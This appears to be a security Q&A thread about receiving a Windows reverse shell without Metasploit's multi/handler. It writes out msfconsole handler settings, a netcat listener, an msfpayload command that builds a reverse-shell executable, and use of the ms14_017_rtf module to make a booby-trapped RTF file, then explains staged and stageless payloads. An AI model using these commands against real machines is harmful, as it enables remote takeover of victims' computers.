# Standalone multi/handler reverse_tcp

Tags: metasploit

Sorry for my english.
Using metasploit I generated an exploit for windows 7 with windows/shell/reverse_tcp payload.
Then I waiting connection using msfconsole:

```
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit
```

I am successfully connected to command line of windows.
However I need to expect connection without using metasploit. I found how to create standalone module, but it was only for an exploit. 
I need standalone multi/handler reverse_tcp or simply the code which listens to a certain port and then gives access to command line.

Answer (score 0, accepted):

I don't really know what your **constraints/restrictions** are.
My guess is that, you want to "receive shells" on a computer without metasploit installed on it.
If that's the case, you could use **msfd**(*metasploit daemon* installed on a different computer) or simply netcat,socat,...

What do you think of this:

- listening with netcat on 192.168.1.2
  `# nc -l -p 4444`
- Using a *shell_reverse_tcp* instead
  `# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe`
- Execute darkbird.exe on the target

Comment: Thanks for the response. I tried nc earlier. Connection is set. But I can not send commands (dir or other). I type dir on server (where is run nc), but occurs nothing.

Comment: `use exploit/windows/fileformat/ms14_017_rtf`  

<br>`set payload windows/shell/reverse_tcp`<br/>

<br>`set filename readme.rtf`<br/>

`set lhost 192.168.182.129`<br/>

<br>`exploit`<br/>  

It's generate rtf file with reverse tcp payload. Then I run this file on windows. And   windows should connect server.

Comment: That's what i suspected. There's a big difference between _windows/shell/reverse_tcp(staged)_ and _windows/shell_reverse_tcp(stageless)_. With netcat, you have to use **windows/shell_reverse_tcp**

Comment: Thanks! It's work.  
And in what a difference between these payloads?

Comment: **Staged payloads** use "tiny stagers" to fit into small exploitation spaces and pull the rest of the payload. **Stageless payloads** or "inline payloads" are self-contained, no stager and more stable.
So with a _netcat listener_, the stager fails to pull the rest of the payload. That's when the msf multi/handler is useful. For further details on 
[PAYLOAD-TYPES](https://www.offensive-security.com/metasploit-unleashed/payload-types/).